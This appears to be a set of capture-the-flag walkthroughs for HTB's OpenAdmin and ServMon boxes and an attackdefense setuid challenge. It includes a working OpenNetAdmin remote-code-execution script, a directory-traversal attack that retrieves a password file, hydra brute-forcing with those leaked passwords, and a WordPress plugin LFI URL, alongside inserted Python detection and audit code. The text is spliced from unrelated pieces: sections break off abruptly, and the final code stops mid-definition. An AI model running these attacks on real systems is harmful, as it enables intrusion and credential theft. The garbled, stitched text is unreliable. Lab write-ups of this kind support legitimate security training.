We start by enumerating the box:
root@kali:~/htb/openadmin# nmap -sV -sT 10.10.10.171
Starting Nmap 7.60 ( https://nmap.org ) at 2020-04-21 00:20 CEST
Nmap scan report for 10.10.10.171
Host is up (0.060s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.07 seconds
Not much is open: just SSH and HTTP.
We check the website; it's just the default HTML page that ships with Apache2.
Let's explore its directories using gobuster:
root@kali:~/htb/openadmin# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.171
Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.171/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/music (Status: 301)
/artwork (Status: 301)
/music looks like something; if we browse there we find a SOLMUSIC application running.
A quick Google search for it reveals an OpenNetAdmin vulnerability. Looks like we're on the right track. But first let's check whether the vulnerable version (v18.1.1) matches the version installed on the box.
After inspecting the exploit a bit we find the admin landing page: http://10.10.10.171/ona/
Luckily admin / admin worked, so we're in, and we can confirm that the version is exactly v18.1.1. \o/
Now we look for that in searchsploit and we find this exploit:
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
If we run it:
root@kali:~/htb/openadmin# ./opennetadminexploit.sh http://10.10.10.171/ona/
$ whoami
www-data
$ cd ..
$ pwd
/opt/ona/www
$ cd ..
$ pwd
/opt/ona/www
$
We get a shell of sorts, but it is restricted: at least cd does not work. That is expected, since the loop sends every command as a separate request and each one runs in a fresh shell, so a directory change never persists. Still, we can extract some information:
$ ls -la /home
total 16
drwxr-xr-x 4 root root 4096 Nov 22 18:00 .
drwxr-xr-x 24 root root 4096 Nov 21 13:41 ..
drwxr-x--- 5 jimmy jimmy 4096 Apr 25 17:59 jimmy
drwxr-x--- 6 joanna joanna 4096 Nov 28 09:37 joanna
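Every command the loop above sends travels in the second xajaxargs[] value, behind the ip=> prefix that ONA's ping tooltip expects, which also makes the injection easy to pick out of captured POST bodies (a WAF log or a PCAP). The check below is an added example, not part of the writeup or of the exploit; the request layout comes from the exploit script, the sample bodies are constructed, and it flags ip=> arguments that carry shell metacharacters.

```python
from urllib.parse import parse_qs
import re

# Characters that end a legitimate "ip=>..." argument and start a shell
# command; the exploit on this page uses ';'.
SHELL_META = re.compile(r"[;|&`]|\$\(")

def find_ona_injection(body: str) -> list:
    """Return the xajaxargs[] values of a POST body that look like injection.

    ONA's window_submit/tooltips call expects entries such as 'ip=>10.0.0.1';
    an 'ip=>' value carrying ';', '|', '&', '`' or '$(' is a command, not an
    address. The body is decoded with '&' as the only separator so that a ';'
    inside a value stays part of that value.
    """
    params = parse_qs(body, keep_blank_values=True, separator="&")
    suspicious = []
    for value in params.get("xajaxargs[]", []):
        if value.startswith("ip=>") and SHELL_META.search(value[len("ip=>"):]):
            suspicious.append(value)
    return suspicious

# Constructed sample: the body the exploit loop above sends for `whoami`.
EXPLOIT_BODY = ("xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
                "&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";whoami;echo \"END\""
                "&xajaxargs[]=ping")
# Constructed sample: the same request shape with a plain address in that slot.
BENIGN_BODY = ("xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
               "&xajaxargs[]=ip%3D%3E10.10.10.171&xajaxargs[]=ping")

if __name__ == "__main__":
    for name, body in (("exploit", EXPLOIT_BODY), ("benign", BENIGN_BODY)):
        print(name, "->", find_ona_injection(body) or "clean")
```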
So let's do some deeper enumeration with LinEnum:
(part of the output omitted)
### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.21p2
[-] MYSQL version:
mysql Ver 14.14 Distrib 5.7.28, for Linux (x86_64) using EditLine wrapper
[-] Apache version:
Server version: Apache/2.4.29 (Ubuntu)
Server built: 2019-09-16T12:58:48
[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
[-] Installed Apache modules:
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
mime_module (shared)
mpm_itk_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php7_module (shared)
reqtimeout_module (shared)
setenvif_module (shared)
status_module (shared)
### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/curl
[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1660 Nov 22 18:01 /etc/passwd
-rw-r--r-- 1 root root 749 Jan 2 13:46 /etc/group
-rw-r--r-- 1 root root 581 Apr 9 2018 /etc/profile
-rw-r----- 1 root shadow 1177 Nov 22 18:01 /etc/shadow
[-] SUID files:
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 109432 Jul 12 2019 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 149080 Oct 10 2019 /usr/bin/sudo
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 26696 Aug 22 2019 /bin/umount
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 43088 Aug 22 2019 /bin/mount
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40152 May 15 2019 /snap/core/7270/bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/7270/bin/ping
-rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/7270/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/7270/bin/su
-rwsr-xr-x 1 root root 27608 May 15 2019 /snap/core/7270/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/7270/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/7270/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/7270/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/7270/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/7270/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jun 10 2019 /snap/core/7270/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10 2019 /snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/7270/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 102600 Jun 21 2019 /snap/core/7270/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/7270/usr/sbin/pppd
-rwsr-xr-x 1 root root 40152 Oct 10 2019 /snap/core/8039/bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/8039/bin/ping
-rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/8039/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/8039/bin/su
-rwsr-xr-x 1 root root 27608 Oct 10 2019 /snap/core/8039/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/8039/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/8039/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/8039/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/8039/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/8039/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Oct 11 2019 /snap/core/8039/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10 2019 /snap/core/8039/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/8039/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Oct 30 12:39 /snap/core/8039/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/8039/usr/sbin/pppd
[-] SGID files:
-rwsr-sr-x 1 root root 109432 Jul 12 2019 /usr/lib/snapd/snap-confine
-rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root shadow 22808 Mar 22 2019 /usr/bin/expiry
-rwxr-sr-x 1 root mlocate 43088 Mar 1 2018 /usr/bin/mlocate
-rwxr-sr-x 1 root ssh 362640 Mar 4 2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 14328 Jan 17 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root tty 30800 Aug 22 2019 /usr/bin/wall
-rwxr-sr-x 1 root crontab 39352 Nov 16 2017 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 71816 Mar 22 2019 /usr/bin/chage
-rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 35632 Apr 9 2018 /snap/core/7270/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 35600 Apr 9 2018 /snap/core/7270/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 62336 Mar 25 2019 /snap/core/7270/usr/bin/chage
-rwxr-sr-x 1 root systemd-network 36080 Apr 5 2016 /snap/core/7270/usr/bin/crontab
-rwxr-sr-x 1 root mail 14856 Dec 7 2013 /snap/core/7270/usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 22768 Mar 25 2019 /snap/core/7270/usr/bin/expiry
-rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/7270/usr/bin/mail-lock
-rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/7270/usr/bin/mail-touchlock
-rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/7270/usr/bin/mail-unlock
-rwxr-sr-x 1 root crontab 358624 Mar 4 2019 /snap/core/7270/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 27368 May 15 2019 /snap/core/7270/usr/bin/wall
-rwsr-sr-x 1 root root 102600 Jun 21 2019 /snap/core/7270/usr/lib/snapd/snap-confine
-rwxr-sr-x 1 root shadow 35632 Apr 9 2018 /snap/core/8039/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 35600 Apr 9 2018 /snap/core/8039/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 62336 Mar 25 2019 /snap/core/8039/usr/bin/chage
-rwxr-sr-x 1 root systemd-network 36080 Apr 5 2016 /snap/core/8039/usr/bin/crontab
-rwxr-sr-x 1 root mail 14856 Dec 7 2013 /snap/core/8039/usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 22768 Mar 25 2019 /snap/core/8039/usr/bin/expiry
-rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/8039/usr/bin/mail-lock
-rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/8039/usr/bin/mail-touchlock
-rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/8039/usr/bin/mail-unlock
-rwxr-sr-x 1 root crontab 358624 Mar 4 2019 /snap/core/8039/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 27368 Oct 10 2019 /snap/core/8039/usr/bin/wall
-rwsr-sr-x 1 root root 106696 Oct 30 12:39 /snap/core/8039/usr/lib/snapd/snap-confine
[+] Files with POSIX capabilities set:
/usr/bin/mtr-packet = cap_net_raw+ep
[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered
[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 14867 Oct 13 2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 1260 Feb 26 2018 /etc/ucf.conf
-rw-r--r-- 1 root root 5898 Aug 5 2019 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf
-rw-r--r-- 1 root root 552 Apr 4 2018 /etc/pam.conf
-rw-r--r-- 1 root root 350 Aug 5 2019 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 191 Feb 7 2018 /etc/libaudit.conf
-rw-r--r-- 1 root root 703 Aug 21 2017 /etc/logrotate.conf
-rw-r--r-- 1 root root 403 Mar 1 2018 /etc/updatedb.conf
-rw-r--r-- 1 root root 2584 Feb 1 2018 /etc/gai.conf
-rw-r--r-- 1 root root 100 Jun 25 2018 /etc/sos.conf
-rw-r--r-- 1 root root 2969 Feb 28 2018 /etc/debconf.conf
-rw-r--r-- 1 root root 812 Mar 24 2018 /etc/mke2fs.conf
-rw-r--r-- 1 root root 144 Nov 21 13:40 /etc/kernel-img.conf
-rw-r--r-- 1 root root 92 Apr 9 2018 /etc/host.conf
-rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 1358 Jan 30 2018 /etc/rsyslog.conf
-rw-r--r-- 1 root root 604 Aug 13 2017 /etc/deluser.conf
-rw-r--r-- 1 root root 3028 Aug 5 2019 /etc/adduser.conf
-rw-r--r-- 1 root root 2683 Jan 17 2018 /etc/sysctl.conf
-rw-r--r-- 1 root root 6920 Sep 20 2018 /etc/overlayroot.conf
-rw-r--r-- 1 root root 4861 Feb 22 2018 /etc/hdparm.conf
-rw-r--r-- 1 root root 513 Aug 5 2019 /etc/nsswitch.conf
[-] Location and Permissions (if accessible) of .bak file(s):
-rw------- 1 root root 1614 Nov 21 14:12 /var/backups/passwd.bak
-rw------- 1 root shadow 599 Nov 21 19:20 /var/backups/gshadow.bak
-rw------- 1 root root 717 Nov 21 19:20 /var/backups/group.bak
-rw------- 1 root shadow 1060 Nov 21 16:44 /var/backups/shadow.bak
[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Aug 5 2019 .
drwxr-xr-x 14 root root 4096 Nov 21 14:08 ..
### SCAN COMPLETE ####################################
$
We start by enumerating the next box, ServMon:
nmap -sT -sV 10.10.10.184
Starting Nmap 7.60 ( https://nmap.org ) at 2020-04-14 01:06 CEST
Nmap scan report for 10.10.10.184
Host is up (0.068s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp open http
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open napster?
8443/tcp open ssl/https-alt
Going through the services starting from the lowest port, we first try FTP:
root@kali:~# ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:root): servmon
331 Password required
Password:
530 User cannot log in.
Login failed.
Remote system type is Windows_NT.
ftp> quit
221 Goodbye.
After checking for typical passwords, we try the anonymous account:
root@kali:~# ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:05PM <DIR> Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:06PM <DIR> Nadine
01-18-20 12:08PM <DIR> Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:08PM 174 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
174 bytes received in 0.05 secs (3.2792 kB/s)
ftp> cd ..
250 CWD command successful.
ftp> cd Nathan
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:10PM 186 Notes to do.txt
226 Transfer complete.
ftp> get Notes\ to\ do.txt
local: Notes to do.txt remote: Notes to do.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
186 bytes received in 0.05 secs (3.4413 kB/s)
ftp> exit
221 Goodbye.
We just found a couple of text files that will give us some hints later on.
root@kali:~/htb/servmon# more Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
root@kali:~/htb/servmon# more Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
Now let's check the website, since port 80 is open, and we see an NVMS-1000 web portal. Using searchsploit (or Google) we find there is an LFI vulnerability. We download the exploit and try to access the Passwords.txt file that Nadine mentioned to Nathan.
root@kali:~/htb/servmon# python dirtrav.py http://10.10.10.184/ /Users/Nathan/Desktop/Passwords.txt Passwords.txt
Directory Traversal Succeeded
Saving Output
root@kali:~/htb/servmon# more Passwords.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
Yes! We found a file that is apparently full of passwords. Let's try them against some of the services (we create a userlist file containing Nathan, Nadine and ServMon). For that we brute-force FTP and SSH with hydra:
root@kali:~/htb/servmon# hydra -t 5 -V -f -L userlist -P Passwords.txt ftp://10.10.10.184
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2020-04-19 19:46:55
[DATA] max 5 tasks per 1 server, overall 5 tasks, 21 login tries (l:3/p:0), ~7 tries per task
[DATA] attacking ftp://10.10.10.184:21/
[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "1nsp3ctTh3Way2Mars!" - 1 of 0 [child 21] (0/0)
[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "Th3r34r3To0M4nyTrait0r5!" - 2 of 0 [child 21] (0/1)
[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "B3WithM30r4ga1n5tMe" - 3 of 0 [child 21] (0/2)
[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "L1k3B1gBut7s@W0rk" - 4 of 0 [child 21] (0/3)
[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "0nly7h3y0unGWi11F0l10w" - 5 of 0 [child 21] (0/4)
[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "IfH3s4b0Utg0t0H1sH0me" - 6 of 0 [child 21] (0/0)
[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "Gr4etN3w5w17hMySk1Pa5$" - 7 of 0 [child 21] (0/1)
[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "1nsp3ctTh3Way2Mars!" - 8 of 0 [child 21] (0/3)
[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "Th3r34r3To0M4nyTrait0r5!" - 9 of 0 [child 21] (0/4)
[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "B3WithM30r4ga1n5tMe" - 10 of 0 [child 21] (0/2)
[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "L1k3B1gBut7s@W0rk" - 11 of 0 [child 21] (0/0)
[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "0nly7h3y0unGWi11F0l10w" - 12 of 0 [child 21] (0/1)
[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "IfH3s4b0Utg0t0H1sH0me" - 13 of 0 [child 21] (0/3)
[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "Gr4etN3w5w17hMySk1Pa5$" - 14 of 0 [child 21] (0/4)
[ATTEMPT] target 10.10.10.184 - login "ServMon" - pass "1nsp3ctTh3Way2Mars!" - 15 of 0 [child 21] (0/2)
[ATTEMPT] target 10.10.10.184 - login "ServMon" - pass "Th3r34r3To0M4nyTrait0r5!" - 16 of 0 [child 21] (0/0)
[ATTEMPT] target 10.10.10.184 - login "ServMon" - pass "B3WithM30r4ga1n5tMe" - 17 of 0 [child 21] (0/4)
[ATTEMPT] target 10.10.10.184 - login "ServMon" - pass "L1k3B1gBut7s@W0rk" - 18 of 0 [child 21] (0/1)
[ATTEMPT] target 10.10.10.184 - login "ServMon" - pass "0nly7h3y0unGWi11F0l10w" - 19 of 0 [child 21] (0/3)
[ATTEMPT] target 10.10.10.184 - login "ServMon" - pass "IfH3s4b0Utg0t0H1sH0me" - 20 of 0 [child 21] (0/2)
[ATTEMPT] target 10.10.10.184 - login "ServMon" - pass "Gr4etN3w5w17hMySk1Pa5$" - 21 of 0 [child 21] (0/0)
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-04-19 19:46:57
root@kali:~/htb/servmon# hydra -l Nathan -P Passwords.txt ssh://10.10.10.184 -V
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2020-04-19 19:57:27
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 7 tasks per 1 server, overall 7 tasks, 7 login tries (l:1/p:0), ~7 try per task
[DATA] attacking ssh://10.10.10.184:22/
[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "1nsp3ctTh3Way2Mars!" - 1 of 0 [child 7] (0/0)
[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "Th3r34r3To0M4nyTrait0r5!" - 2 of 0 [child 7] (0/1)
[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "B3WithM30r4ga1n5tMe" - 3 of 0 [child 7] (0/2)
[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "L1k3B1gBut7s@W0rk" - 4 of 0 [child 7] (0/3)
[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "0nly7h3y0unGWi11F0l10w" - 5 of 0 [child 7] (0/4)
[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "IfH3s4b0Utg0t0H1sH0me" - 6 of 0 [child 7] (0/5)
[ATTEMPT] target 10.10.10.184 - login "Nathan" - pass "Gr4etN3w5w17hMySk1Pa5$" - 7 of 0 [child 7] (0/6)
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-04-19 19:57:30
root@kali:~/htb/servmon# hydra -l Nadine -P Passwords.txt ssh://10.10.10.184 -V
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2020-04-19 19:57:37
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 7 tasks per 1 server, overall 7 tasks, 7 login tries (l:1/p:0), ~7 try per task
[DATA] attacking ssh://10.10.10.184:22/
[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "1nsp3ctTh3Way2Mars!" - 1 of 0 [child 7] (0/0)
[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "Th3r34r3To0M4nyTrait0r5!" - 2 of 0 [child 7] (0/1)
[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "B3WithM30r4ga1n5tMe" - 3 of 0 [child 7] (0/2)
[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "L1k3B1gBut7s@W0rk" - 4 of 0 [child 7] (0/3)
[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "0nly7h3y0unGWi11F0l10w" - 5 of 0 [child 7] (0/4)
[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "IfH3s4b0Utg0t0H1sH0me" - 6 of 0 [child 7] (0/5)
[ATTEMPT] target 10.10.10.184 - login "Nadine" - pass "Gr4etN3w5w17hMySk1Pa5$" - 7 of 0 [child 7] (0/6)
[22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-04-19 19:57:39
Great! We found SSH credentials for Nadine.
We log in and right on the Desktop we find the flag:
nadine@SERVMON C:\Users\Nadine>cd Desktop
nadine@SERVMON C:\Users\Nadine\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Users\Nadine\Desktop
08/04/2020 22:28 <DIR> .
08/04/2020 22:28 <DIR> ..
19/04/2020 18:41 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 27,416,674,304 bytes free
nadine@SERVMON C:\Users\Nadine\Desktop>more user.txt
bd94d85aed97a7c666c3f34588d283fa
Checking the CVE page's proof of concept, we can already identify the file with the LFI vulnerability:
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
Initially, as g0tmi1k recommends, we should enumerate, enumerate and enumerate.
Checking distro and kernel to find any publicly known privilege escalation methods:
cat /etc/issue
uname -a
Nothing interesting was found here.
It's important to focus on what the challenge name suggests and walk down that path. Let's look for programs with the setuid bit set:
student@attackdefense:~$ find / -perm -u=s
find: '/root': Permission denied
find: '/proc/tty/driver': Permission denied
find: '/proc/21/task/21/fd': Permission denied
find: '/proc/21/task/21/fdinfo': Permission denied
find: '/proc/21/task/21/ns': Permission denied
find: '/proc/21/fd': Permission denied
find: '/proc/21/map_files': Permission denied
find: '/proc/21/fdinfo': Permission denied
find: '/proc/21/ns': Permission denied
find: '/proc/82/task/82/fd/12': No such file or directory
find: '/proc/82/task/82/fdinfo/12': No such file or directory
find: '/proc/82/fd/11': No such file or directory
find: '/proc/82/fdinfo/11': No such file or directory
find: '/etc/ssl/private': Permission denied
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/vim.tiny
/usr/bin/sudo
find: '/var/lib/apt/lists/partial': Permission denied
find: '/var/cache/apt/archives/partial': Permission denied
find: '/var/cache/ldconfig': Permission denied
/bin/mount
/bin/umount
/bin/su
Of all these files, vim.tiny is the one that shouldn't have the setuid bit set; that's probably a misconfiguration.
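The same question applies to the LinEnum SUID list from the first box and to this find output: which of these setuid binaries have no business being there? The audit below is an added example, not part of either writeup; its baseline is assumed (the setuid paths the two listings on this page show on stock Ubuntu, minus vim.tiny), and it handles both find's bare paths, including the permission-denied noise, and LinEnum's ls -l lines, counting only entries whose owner-execute bit is s.

```python
import re

# Assumed baseline: setuid binaries a stock Ubuntu 18.04 box carries, taken
# from the LinEnum and find listings on this page minus vim.tiny.
EXPECTED_SUID = {
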